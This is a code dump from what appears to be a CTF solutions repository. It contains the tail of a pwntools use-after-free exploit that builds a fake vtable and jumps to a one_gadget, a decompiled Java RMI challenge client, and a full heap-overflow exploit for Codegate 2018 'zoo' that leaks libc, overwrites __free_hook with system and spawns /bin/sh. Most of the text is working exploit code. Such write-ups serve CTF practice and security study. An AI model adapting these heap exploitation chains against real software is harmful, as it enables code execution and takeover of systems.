66 | conn.recvuntil("Subtitle Language") 67 | conn.send(lang) 68 | conn.recvuntil("Subtitle Length") 69 | conn.send(p32(length)) 70 | conn.recvuntil("Add Subtitle") 71 | conn.send(subtitle) 72 | 73 | def add_meta(date, owner): 74 | """ 0x1f 0x1f 75 | malloc(0x48) 76 | """ 77 | menu(1) 78 | clip_menu(4) 79 | conn.recvuntil("Date of Creation") 80 | conn.send(date) 81 | conn.recvuntil("Owner") 82 | conn.send(owner) 83 | 84 | def edit_video(idx, res, fps, no, data, desc): 85 | menu(2, idx) 86 | conn.recvuntil("Video Resolution") 87 | conn.send(res) 88 | conn.recvuntil("FPS :") 89 | conn.send(fps) 90 | conn.recvuntil("Number of Frames") 91 | conn.send(p32(no)) 92 | conn.recvuntil("Video Data") 93 | conn.send(data) # UAF 94 | conn.recvuntil("Edit description") 95 | conn.send(desc) 96 
| 97 | def edit_audio(idx, bitrate, length, data, desc): 98 | menu(2, idx) 99 | conn.recvuntil("Audio Bitrate") 100 | conn.send(bitrate) 101 | conn.recvuntil("Audio Length") 102 | conn.send(p32(length)) 103 | # Free earlier data and malloc again 104 | conn.recvuntil("Audio Data") 105 | conn.send(data) 106 | conn.recvuntil("Edit description") 107 | conn.send(desc) 108 | 109 | def edit_sub(idx, lang, data): 110 | menu(2, idx) 111 | conn.recvuntil("New Language") 112 | conn.send(lang) 113 | conn.recvuntil("Edit data") 114 | conn.send(data) 115 | 116 | def edit_meta(idx, date, owner): 117 | menu(2, idx) 118 | conn.recvuntil("Date of Creation") 119 | conn.send(date) 120 | conn.recvuntil("Owner") 121 | conn.send(owner) 122 | 123 | def play_video(idx, l): 124 | menu(3, idx) 125 | conn.recvuntil("Playing video...\n") 126 | leak = conn.recvn(l) 127 | res = "" 128 | for i in leak: 129 | res += chr(ord(i) ^ 0xcc) 130 | return res 131 | 132 | def play_audio(idx): 133 | """ Leaks only if integer is two char """ 134 | menu(3, idx) 135 | conn.recvuntil(": ") 136 | 137 | def delete(idx): 138 | """free(...); sets to 0""" 139 | menu(4, idx) 140 | 141 | conn.recvuntil("What is your movie name?\n") 142 | conn.sendline("vampire") 143 | 144 | # Leaking heap address 145 | add_video("a", "b", 10, "aa", "bb") # 0 146 | 147 | add_video("a", "b", 10, "aa", "bb") # 1 148 | edit_video(0, "a", "b", 0x48, p64(0) + "\x00"*0x40, "bb") 149 | add_audio("a", 10, "data", "desc") # 2 150 | leak = play_video(0, 0x48) 151 | heap_leak = u64(leak[0x10:0x18]) 152 | 153 | delete(0) # Audio chunk at 2 will be cleared 154 | 155 | audio_real_vtable = 0x402938 156 | 157 | def a_read(addr, l, j): 158 | res = "" 159 | for i in range(l): 160 | # Rewriting the fake audio chunk 161 | fake_audio_chunk = p64(audio_real_vtable) + \ 162 | p32(0) + \ 163 | p32(0) + \ 164 | p64(addr) + \ 165 | "desc" 166 | add_sub(0x48, fake_audio_chunk, lang="a") # j 167 | play_audio(2) 168 | leak = conn.recvline().strip() 169 | res += 
chr(int(leak) ^ 0x55) 170 | delete(j) 171 | j += 1 172 | addr += 1 173 | return res 174 | 175 | read_addr = u64(a_read(bin.got['read'], 8, 3)) 176 | 177 | # Putting a vtable at a known address 178 | one_gadget_addr = read_addr - libc.symbols['read'] + 0xf1117 179 | fake_vtable = p64(one_gadget_addr)*4 180 | 181 | add_video("a", "b", 10, "aa", "bb") # 11 182 | edit_video(11, "a", "b", 0x48, "\x00"*0x48, "bb") 183 | add_audio("a", 8*4, fake_vtable, "desc") # 12 184 | leak = play_video(11, 0x48) 185 | fake_vtable_addr = u64(leak[0x10:0x18]) 186 | 187 | delete(11) # Audio chunk at 12 will be cleared 188 | 189 | # Controlling RIP 190 | fake_audio_chunk = p64(fake_vtable_addr) 191 | add_sub(0x48, fake_audio_chunk, lang="a") 192 | #pause() 193 | play_audio(12) 194 | 195 | log.info("Heap leak: " + hex(heap_leak)) 196 | log.info("Read addr: " + hex(read_addr)) 197 | 198 | conn.interactive() 199 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/Muggle.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 
3 | */ 4 | package ch.scrt; 5 | 6 | import ch.scrt.WizardAPI; 7 | import ch.scrt.model.Artifact; 8 | import ch.scrt.model.Broomstick; 9 | import ch.scrt.model.Cauldron; 10 | import ch.scrt.model.Frog; 11 | import ch.scrt.model.Gem; 12 | import ch.scrt.model.Hat; 13 | import ch.scrt.model.Lamp; 14 | import ch.scrt.model.Mirror; 15 | import ch.scrt.model.Scroll; 16 | import ch.scrt.model.TeaSet; 17 | import ch.scrt.model.Wand; 18 | import java.io.InputStream; 19 | import java.io.PrintStream; 20 | import java.net.InetAddress; 21 | import java.rmi.Remote; 22 | import java.rmi.registry.LocateRegistry; 23 | import java.rmi.registry.Registry; 24 | import java.util.Properties; 25 | import java.util.Scanner; 26 | import javax.rmi.ssl.SslRMIClientSocketFactory; 27 | import org.apache.commons.lang3.tuple.Pair; 28 | 29 | public class Muggle { 30 | public static void main(String[] args) { 31 | try { 32 | String choice; 33 | /*Properties props = System.getProperties(); 34 | props.setProperty("javax.net.ssl.trustStore", "magic_hat_truststore"); 35 | props.setProperty("javax.net.ssl.trustStorePassword", "magic_hat"); 36 | Registry registry = LocateRegistry.getRegistry(InetAddress.getByName("magichat.teaser.insomnihack.ch").getHostName(), 51966, new SslRMIClientSocketFactory()); 37 | */ 38 | Registry registry = LocateRegistry.getRegistry(InetAddress.getByName("localhost").getHostName(), 2020); 39 | WizardAPI wizardAPI = (WizardAPI)registry.lookup("Wizard"); 40 | Scanner s = new Scanner(System.in); 41 | for (int idx = 0; idx < 2; ++idx) { 42 | System.out.println(wizardAPI.message(idx)); 43 | System.out.print("[c]ontinue\n> "); 44 | choice = ""; 45 | while (!choice.equals("c")) { 46 | choice = s.nextLine(); 47 | } 48 | } 49 | Hat magicHat = wizardAPI.getMagicHat(); 50 | System.out.println("*you received a Magic Hat!*"); 51 | choice = ""; 52 | while (!choice.equals("q")) { 53 | System.out.print("[a]dd an artifact inside the Magic Hat\n[s]end the Magic Hat to the Wizard for him to cast 
a spell\n[i]nspect your hat\n[q]uit \n> "); 54 | block6 : switch (choice = s.nextLine()) { 55 | case "a": { 56 | String artifact; 57 | System.out.print("[b]roomstick\n[c]auldron\n[g]em\n[f]rog\n[h]at\n[l]amp\n[m]irror\n[s]croll\n[t]ea set\n[w]and\n> "); 58 | switch (artifact = s.nextLine()) { 59 | case "b": { 60 | magicHat.add(new Broomstick()); 61 | break block6; 62 | } 63 | case "c": { 64 | magicHat.add(new Cauldron()); 65 | break block6; 66 | } 67 | case "g": { 68 | magicHat.add(new Gem()); 69 | break block6; 70 | } 71 | case "f": { 72 | magicHat.add(new Frog()); 73 | break block6; 74 | } 75 | case "h": { 76 | magicHat.add(new Hat()); 77 | break block6; 78 | } 79 | case "l": { 80 | magicHat.add(new Lamp()); 81 | break block6; 82 | } 83 | case "m": { 84 | magicHat.add(new Mirror()); 85 | break block6; 86 | } 87 | case "s": { 88 | magicHat.add(new Scroll()); 89 | break block6; 90 | } 91 | case "t": { 92 | magicHat.add(new TeaSet()); 93 | break block6; 94 | } 95 | case "w": { 96 | magicHat.add(new Wand()); 97 | break block6; 98 | } 99 | } 100 | System.out.println("*unknown artifact, nothing was added*"); 101 | break; 102 | } 103 | case "s": { 104 | Pair answer = wizardAPI.castASpell(magicHat); 105 | magicHat = answer.getRight(); 106 | System.out.println(answer.getLeft()); 107 | break; 108 | } 109 | case "i": { 110 | System.out.println(Muggle.tabularize("1x " + magicHat.toString())); 111 | break; 112 | } 113 | } 114 | } 115 | } 116 | catch (Exception e) { 117 | System.out.println("Muggle exception: " + e.getMessage()); 118 | e.printStackTrace(); 119 | } 120 | } 121 | 122 | private static String tabularize(String s) { 123 | StringBuilder s2 = new StringBuilder(); 124 | int tabLevel = 0; 125 | for (char c : s.toCharArray()) { 126 | if (c == '[') { 127 | ++tabLevel; 128 | s2.append("\t"); 129 | continue; 130 | } 131 | if (c == ']') { 132 | --tabLevel; 133 | continue; 134 | } 135 | s2.append(c); 136 | if (c != '\n') continue; 137 | for (int i = 0; i < tabLevel; ++i) { 
138 | s2.append("\t"); 139 | } 140 | } 141 | return s2.toString(); 142 | } 143 | } 144 | 145 | -------------------------------------------------------------------------------- /codegate-2018/zoo/exploit.py: -------------------------------------------------------------------------------- 1 | """ 2 | This challenge took me about 10-15 hours to solve, which involved around 4-5 3 | hours of reversing. Didn't solve it during the CTF. 4 | 5 | I have written some pseudocode in dec.c 6 | 7 | Basic idea: 8 | 9 | 1. Leak heap address by setting the length of the animal's name to 0x14. 10 | 2. Trigger the overflow in feed function by feeding/walking appropriately. 11 | 3. Allocate 2 consecutive chunks and free the first one. 12 | 4. Allocate another chunk (the same first one as above) and overflow into the second one. 13 | 5. Overflow such that on freeing the second chunk, it coalesces with an animal chunk at the start. 14 | 6. That animal chunk's feeds[0] and feeds[1] would be taken as 'fd' and 'bk' pointers. 15 | 7. Trigger overflow in that chunk to initialize fd->bk and bk->fd properly. 16 | 8. Allocate chunks from that animal chunk to overwrite 'species' with the heap address of chunk in unsorted bin + 0x10 and leak libc. 17 | 9. Keep on allocating to forge the next animal chunk and set likes > 14. 18 | 10. Walk any existing chunk and overwrite the contents of the animal chunk's feed to clear invalid pointers and also set up pointers to '__free_hook' and '/bin/sh'. 19 | 11. Overwrite free hook with system. 
20 | """ 21 | 22 | from pwn import * 23 | 24 | #context.log_level = 'debug' 25 | context.terminal = ['tmux', 'splitw', '-h'] 26 | 27 | file = "./zoo" 28 | 29 | libc = ELF("libc.so.6") 30 | 31 | bin = ELF(file) 32 | 33 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 34 | conn = process(file, env=env) 35 | #gdb.attach(conn) 36 | 37 | #conn = remote("ch41l3ng3s.codegate.kr", 3333) 38 | 39 | def give_name(name): 40 | conn.recvuntil("enter your name") 41 | conn.send(name) 42 | conn.recvuntil("open your own zoo") 43 | 44 | def menu(choice): 45 | conn.recvuntil("[7] Close the zoo") 46 | conn.sendline(str(choice)) 47 | 48 | def adopt(ch, name): 49 | menu(1) 50 | conn.recvuntil("Lion") 51 | conn.sendline(str(ch)) 52 | conn.recvuntil("Please name the animal") 53 | conn.send(name) 54 | 55 | def feed(name, m_name=None, m_desc=None): 56 | """malloc(0x80), [malloc(0x80)]""" 57 | menu(2) 58 | conn.recvuntil("animal will you feed") 59 | conn.send(name) 60 | if m_name is not None: 61 | conn.recvuntil("name of this medicine") 62 | conn.send(m_name) 63 | conn.recvuntil("description of this medicine") 64 | conn.send(m_desc) 65 | 66 | def clean(name): 67 | """free(dung)""" 68 | menu(3) 69 | conn.recvuntil("animal's dung will you clean?") 70 | conn.send(name) 71 | conn.recvuntil("Good job") 72 | 73 | def walk(name, messages = None): 74 | """free(feed)""" 75 | menu(4) 76 | conn.recvuntil("animal do you want to take") 77 | conn.send(name) 78 | if messages is not None: 79 | for message in messages: 80 | conn.recvuntil("You can give a msg") 81 | conn.send(message) 82 | 83 | def hospital(name): 84 | menu(5) 85 | conn.recvuntil("animal will you take") 86 | conn.send(name) 87 | 88 | def list(name): 89 | menu(6) 90 | conn.recvuntil("animal info do you") 91 | conn.send(name) 92 | 93 | give_name("vampire\n") 94 | 95 | # Leaking heap address 96 | adopt(1, "a"*0x14) 97 | feed("a"*0x14) 98 | conn.recvuntil("a"*0x14) 99 | heap_addr = u64(conn.recvuntil("\x20")[:-1].ljust(8, "\x00")) 
100 | 101 | fake_chunk_size = 1560 102 | 103 | adopt(1, "ani1\n") 104 | adopt(1, "dk\n\x00" + p64(0) + p64(fake_chunk_size + 1)) 105 | adopt(1, "ani3\n") 106 | 107 | for i in range(5): 108 | feed("ani1\n") 109 | 110 | # All dungs will be consecutive chunks 111 | for i in range(9): 112 | walk("ani1\n") 113 | feed("ani1\n") 114 | 115 | hospital("ani1\n") 116 | 117 | # Freeing all feeds 118 | for i in range(5): 119 | walk("ani1\n") 120 | 121 | # Creating two consecutive chunks 122 | feed("ani1\n", m_name="aa", m_desc="bb") 123 | feed("ani3\n") 124 | 125 | # Freeing the first one 126 | walk("ani1\n") 127 | 128 | # Overwriting to create a coalesced chunk with dk animal 129 | payload = "\x00"*0x68 + \ 130 | p64(fake_chunk_size) + \ 131 | p64(0x90) 132 | 133 | # Allocating it in ani1 and overflowing into next chunk 134 | feed("ani1\n", m_name="zzzzzzzz", m_desc=payload) 135 | 136 | # Pointing dk's feeds[0] and feeds[1] to setup linked list 137 | # First making dk ill 138 | for i in range(5): 139 | feed("dk\n") 140 | 141 | for i in range(9): 142 | walk("dk\n") 143 | feed("dk\n") 144 | 145 | hospital("dk\n") 146 | 147 | for i in range(6): 148 | feed("dk\n", m_name="aa", m_desc="pp") 149 | 150 | fake_chunk_addr = heap_addr - 0x55e2136828c0 + 0x55e2136823b8 151 | # Forging fd and bk pointers 152 | feed("dk\n", m_name=p64(fake_chunk_addr), m_desc=p64(fake_chunk_addr)) 153 | feed("dk\n", m_name=p64(fake_chunk_addr), m_desc=p64(fake_chunk_addr)) 154 | 155 | walk("ani3\n") 156 | 157 | libc_leak_addr = heap_addr - 0x55a3ebdc58c0 + 0x55a3ebdc54e8 158 | species_addr = heap_addr - 0x560f2a9dc8c0 + 0x560f2a9dc468 159 | 160 | # Now any chunk I allocate, it will be actually dk chunk 161 | # This starts from feed 3 162 | payload = "\x00"*0x50 163 | 164 | feed("ani1\n", m_name=p64(0), m_desc=payload) 165 | feed("ani1\n", m_name=p64(libc_leak_addr), m_desc="bbbb") 166 | 167 | list("dk\n") 168 | conn.recvuntil("Species : ") 169 | libc_leak = u64(conn.recvn(6) + "\x00"*2) 170 | 171 | 
log.info("Libc Leak: " + hex(libc_leak)) 172 | 173 | #libc.address = libc_leak - 0x7efee9099b78 + 0x7efee8cd5000 174 | libc.address = libc_leak - 0x7fdeda264b78 + 0x7fded9ea0000 175 | 176 | # Making next animal's next initialized != -1 177 | # Name would be "1111" 178 | payload = "\x00"*0x60 + p32(1) + "1111\x00" 179 | feed("ani1\n", m_name="cccc", m_desc=payload) 180 | 181 | # Initial fastbin chunk that can be freed 182 | fast_chunk = heap_addr - 0x55f2ac5268c0 + 0x55f2ac526000 + 0x10 183 | 184 | # Reread the contents of 1111's feed 185 | feed_addr = heap_addr - 0x5651c72c78c0 + 0x5651c72c75b0 186 | feed("ani1\n", m_name=p64(fast_chunk), m_desc=p64(feed_addr)) 187 | feed("ani1\n", m_name="gggg", m_desc="hhhh") 188 | # Overwriting likes, feed_index, etc. of "1111" animal 189 | payload = "2"*0x38 + \ 190 | p32(14) + \ 191 | p32(2) 192 | feed("ani1\n", m_name="iiii", m_desc=payload) 193 | 194 | feed_to_be_freed = heap_addr - 0x55c47a9968c0 + 0x55c47a996950 195 | 196 | messages = [] 197 | messages.append(p64(libc.symbols['__free_hook'] - 0x18) + \ 198 | p64(feed_to_be_freed - 0x18) + p64(0)*10) 199 | messages.append(p64(libc.symbols['system'])) 200 | messages.append("/bin/sh\x00") 201 | 202 | walk("1111\n", messages) # Free fast_chunk 203 | 204 | walk("ani1\n") 205 | 206 | log.info("Leaked heap address: " + hex(heap_addr)) 207 | log.info("Leaked libc address: " + hex(libc_leak)) 208 | 209 | conn.interactive() 210 | --------------------------------------------------------------------------------